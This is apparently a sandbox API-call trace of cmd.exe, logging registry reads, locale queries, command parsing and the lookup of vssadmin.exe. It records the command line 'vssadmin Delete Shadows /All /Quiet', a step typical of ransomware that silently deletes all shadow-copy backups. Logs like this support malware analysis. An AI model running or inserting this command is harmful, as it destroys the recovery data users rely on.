[0112.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4abbe194 | out: lpMode=0x4abbe194) returned 1 [0112.971] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.971] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.971] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.971] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4abbe198 | out: lpMode=0x4abbe198) returned 1 [0112.972] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.972] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0112.972] GetEnvironmentStringsW () returned 0x4d8ab0* [0112.972] GetProcessHeap () returned 0x4c0000 [0112.972] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xa7c) returned 0x4d9540 [0112.972] FreeEnvironmentStringsW (penv=0x4d8ab0) returned 1 [0112.972] GetProcessHeap () returned 0x4c0000 [0112.972] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x8) returned 0x4d8350 [0112.972] GetEnvironmentStringsW () returned 0x4d8ab0* [0112.972] GetProcessHeap () returned 0x4c0000 [0112.972] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xa7c) returned 0x4d9fd0 [0112.972] FreeEnvironmentStringsW (penv=0x4d8ab0) returned 1 [0112.972] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee608 | out: phkResult=0x2ee608*=0x44) returned 0x0 [0112.972] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x0, lpData=0x2ee620*=0x18, lpcbData=0x2ee604*=0x1000) returned 0x2 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x4, lpData=0x2ee620*=0x1, lpcbData=0x2ee604*=0x4) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x0, lpData=0x2ee620*=0x1, lpcbData=0x2ee604*=0x1000) returned 0x2 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x4, lpData=0x2ee620*=0x0, lpcbData=0x2ee604*=0x4) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x4, lpData=0x2ee620*=0x40, lpcbData=0x2ee604*=0x4) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x4, lpData=0x2ee620*=0x40, lpcbData=0x2ee604*=0x4) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x0, lpData=0x2ee620*=0x40, lpcbData=0x2ee604*=0x1000) returned 0x2 [0112.973] RegCloseKey (hKey=0x44) returned 0x0 [0112.973] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee608 | out: phkResult=0x2ee608*=0x44) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x0, lpData=0x2ee620*=0x40, lpcbData=0x2ee604*=0x1000) returned 0x2 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x4, lpData=0x2ee620*=0x1, lpcbData=0x2ee604*=0x4) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x0, lpData=0x2ee620*=0x1, lpcbData=0x2ee604*=0x1000) returned 0x2 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x4, lpData=0x2ee620*=0x0, lpcbData=0x2ee604*=0x4) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x4, lpData=0x2ee620*=0x9, lpcbData=0x2ee604*=0x4) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x4, lpData=0x2ee620*=0x9, lpcbData=0x2ee604*=0x4) returned 0x0 [0112.973] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee600, lpData=0x2ee620, lpcbData=0x2ee604*=0x1000 | out: lpType=0x2ee600*=0x0, lpData=0x2ee620*=0x9, lpcbData=0x2ee604*=0x1000) returned 0x2 [0112.973] RegCloseKey (hKey=0x44) returned 0x0 [0112.973] time (in: timer=0x0 | out: timer=0x0) returned 0x5f86c257 [0112.973] srand (_Seed=0x5f86c257) [0112.973] GetCommandLineW () returned="\"cmd\" /C vssadmin Delete Shadows /All /Quiet" [0112.973] GetCommandLineW () returned="\"cmd\" /C vssadmin Delete Shadows /All /Quiet" [0112.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abcc0a0 | out: lpBuffer="C:\\Windows") returned 0xa [0112.974] GetProcessHeap () returned 0x4c0000 [0112.974] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x218) returned 0x4daa60 [0112.974] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4daa70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0112.974] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abbf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0112.974] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abbf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.974] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4abbf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.974] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0112.974] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0112.974] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0112.974] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0112.974] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0112.974] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0112.974] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0112.974] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0112.974] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0112.974] GetProcessHeap () returned 0x4c0000 [0112.974] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d9540 | out: hHeap=0x4c0000) returned 1 [0112.974] GetEnvironmentStringsW () returned 0x4d8ab0* [0112.975] GetProcessHeap () returned 0x4c0000 [0112.975] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xa94) returned 0x4dac80 [0112.975] FreeEnvironmentStringsW (penv=0x4d8ab0) returned 1 [0112.975] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4abbf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.975] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4abbf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0112.975] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0112.975] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0112.975] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0112.975] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0112.975] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0112.975] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0112.975] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0112.975] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0112.975] GetProcessHeap () returned 0x4c0000 [0112.975] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x26) returned 0x4d4600 [0112.975] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef410 | out: lpBuffer="C:\\Windows") returned 0xa [0112.975] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x104, lpBuffer=0x2ef410, lpFilePart=0x2ef3f0 | out: lpBuffer="C:\\Windows", lpFilePart=0x2ef3f0*="Windows") returned 0xa [0112.975] GetFileAttributesW (lpFileName="C:\\Windows" (normalized: "c:\\windows")) returned 0x10 [0112.975] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x2ef120 | out: lpFindFileData=0x2ef120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Windows", cAlternateFileName="")) returned 0x4db720 [0112.976] FindClose (in: hFindFile=0x4db720 | out: hFindFile=0x4db720) returned 1 [0112.976] GetFileAttributesW (lpFileName="C:\\Windows" (normalized: "c:\\windows")) returned 0x10 [0112.976] SetCurrentDirectoryW (lpPathName="C:\\Windows" (normalized: "c:\\windows")) returned 1 [0112.976] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows") returned 1 [0112.976] GetProcessHeap () returned 0x4c0000 [0112.976] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dac80 | out: hHeap=0x4c0000) returned 1 [0112.976] GetEnvironmentStringsW () returned 0x4dac80* [0112.976] GetProcessHeap () returned 0x4c0000 [0112.976] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xab2) returned 0x4d8ab0 [0112.976] FreeEnvironmentStringsW (penv=0x4dac80) returned 1 [0112.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abcc0a0 | out: lpBuffer="C:\\Windows") returned 0xa [0112.976] GetProcessHeap () returned 0x4c0000 [0112.976] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d4600 | out: hHeap=0x4c0000) returned 1 [0112.976] GetProcessHeap () returned 0x4c0000 [0112.976] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4016) returned 0x4dac80 [0112.976] GetProcessHeap () returned 0x4c0000 [0112.976] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x5c) returned 0x4d9570 [0112.976] GetProcessHeap () returned 0x4c0000 [0112.976] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dac80 | out: hHeap=0x4c0000) returned 1 [0112.976] GetConsoleOutputCP () returned 0x1b5 [0112.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4abcbfe0 | out: lpCPInfo=0x4abcbfe0) returned 1 [0112.977] GetUserDefaultLCID () returned 0x409 [0112.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4abc7b50, cchData=8 | out: lpLCData=":") returned 2 [0112.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef520, cchData=128 | out: lpLCData="0") returned 2 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef520, cchData=128 | out: lpLCData="0") returned 2 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef520, cchData=128 | out: lpLCData="1") returned 2 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4abda740, cchData=8 | out: lpLCData="/") returned 2 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4abda4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4abda460, cchData=32 | out: lpLCData="Tue") returned 4 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4abda420, cchData=32 | out: lpLCData="Wed") returned 4 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4abda3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4abda3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4abda360, cchData=32 | out: lpLCData="Sat") returned 4 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4abda700, cchData=32 | out: lpLCData="Sun") returned 4 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4abc7b40, cchData=8 | out: lpLCData=".") returned 2 [0112.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4abda4e0, cchData=8 | out: lpLCData=",") returned 2 [0112.978] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0112.979] GetProcessHeap () returned 0x4c0000 [0112.979] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x20c) returned 0x4d9650 [0112.979] GetConsoleTitleW (in: lpConsoleTitle=0x4d9650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.979] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0112.979] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0112.979] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0112.979] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0112.980] GetProcessHeap () returned 0x4c0000 [0112.980] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4012) returned 0x4dac80 [0112.980] GetProcessHeap () returned 0x4c0000 [0112.980] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dac80 | out: hHeap=0x4c0000) returned 1 [0112.981] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0112.981] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0112.981] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0112.981] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0112.981] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0112.981] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0112.981] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0112.981] GetProcessHeap () returned 0x4c0000 [0112.981] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb0) returned 0x4d9870 [0112.981] GetProcessHeap () returned 0x4c0000 [0112.981] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x22) returned 0x4d4600 [0112.982] GetProcessHeap () returned 0x4c0000 [0112.982] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x48) returned 0x4d8370 [0112.983] GetConsoleTitleW (in: lpConsoleTitle=0x2ef430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0112.984] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0112.984] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0112.984] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0112.984] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0112.984] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0112.984] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0112.984] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0112.984] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0112.984] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0112.984] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0112.984] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0112.984] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0112.984] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0112.984] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0112.984] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0112.984] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0112.984] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0112.984] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0112.984] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0112.984] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0112.984] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0112.984] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0112.984] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0112.984] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0112.985] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0112.985] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0112.985] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0112.985] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0112.985] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0112.985] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0112.985] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0112.985] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0112.985] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0112.985] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0112.985] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0112.985] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0112.985] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0112.985] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0112.985] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0112.985] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0112.985] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0112.985] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0112.985] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0112.985] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0112.985] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0112.985] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0112.986] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0112.986] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0112.986] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0112.986] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0112.986] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0112.986] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0112.986] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0112.986] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0112.986] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0112.986] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0112.986] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0112.986] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0112.986] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0112.986] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0112.986] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0112.986] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0112.987] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0112.987] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0112.987] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0112.987] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0112.987] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0112.987] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0112.987] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0112.987] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0112.987] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0112.987] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0112.987] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0112.987] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0112.987] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0112.987] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0112.987] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0112.987] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0112.987] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0112.987] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0112.987] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0112.987] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0112.987] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0112.987] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0112.988] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0112.988] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0112.988] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0112.988] GetProcessHeap () returned 0x4c0000 [0112.988] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x218) returned 0x4d9930 [0112.988] GetProcessHeap () returned 0x4c0000 [0112.988] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x5a) returned 0x4d9b50 [0112.988] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0112.989] GetProcessHeap () returned 0x4c0000 [0112.989] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x420) returned 0x4dac80 [0112.989] SetErrorMode (uMode=0x0) returned 0x0 [0112.989] SetErrorMode (uMode=0x1) returned 0x0 [0112.989] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4dac90, lpFilePart=0x2eecc0 | out: lpBuffer="C:\\Windows", lpFilePart=0x2eecc0*="Windows") returned 0xa [0112.989] SetErrorMode (uMode=0x0) returned 0x1 [0112.989] GetProcessHeap () returned 0x4c0000 [0112.989] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4dac80, Size=0x38) returned 0x4dac80 [0112.989] GetProcessHeap () returned 0x4c0000 [0112.989] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4dac80) returned 0x38 [0112.989] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abbf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0112.989] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0112.989] GetProcessHeap () returned 0x4c0000 [0112.989] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xf2) returned 0x4d9bc0 [0112.989] GetProcessHeap () returned 0x4c0000 [0112.990] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1d4) returned 0x4d9cc0 [0112.999] GetProcessHeap () returned 0x4c0000 [0112.999] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d9cc0, Size=0xf4) returned 0x4d9cc0 [0113.000] GetProcessHeap () returned 0x4c0000 [0113.000] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4d9cc0) returned 0xf4 [0113.000] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abbf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.000] GetProcessHeap () returned 0x4c0000 [0113.000] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xe8) returned 0x4d9dd0 [0113.000] GetProcessHeap () returned 0x4c0000 [0113.000] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d9dd0, Size=0x7e) returned 0x4d9dd0 [0113.000] GetProcessHeap () returned 0x4c0000 [0113.000] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4d9dd0) returned 0x7e [0113.002] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea30) returned 0xffffffffffffffff [0113.002] GetLastError () returned 0x2 [0113.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x2eea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea30) returned 0xffffffffffffffff [0113.002] GetLastError () returned 0x2 [0113.003] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0113.003] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea30) returned 0x4d9e60 [0113.003] GetProcessHeap () returned 0x4c0000 [0113.003] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x28) returned 0x4d4630 [0113.003] FindClose (in: hFindFile=0x4d9e60 | out: hFindFile=0x4d9e60) returned 1 [0113.003] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x2eea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea30) returned 0xffffffffffffffff [0113.003] GetLastError () returned 0x2 [0113.003] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eea30) returned 0x4d9e60 [0113.004] GetProcessHeap () returned 0x4c0000 [0113.004] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d4630, Size=0x8) returned 0x4d9ec0 [0113.004] FindClose (in: hFindFile=0x4d9e60 | out: hFindFile=0x4d9e60) returned 1 [0113.004] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0113.004] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0113.004] GetConsoleTitleW (in: lpConsoleTitle=0x2eef80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.004] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eed38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eecf8 | out: lpAttributeList=0x2eed38, lpSize=0x2eecf8) returned 1 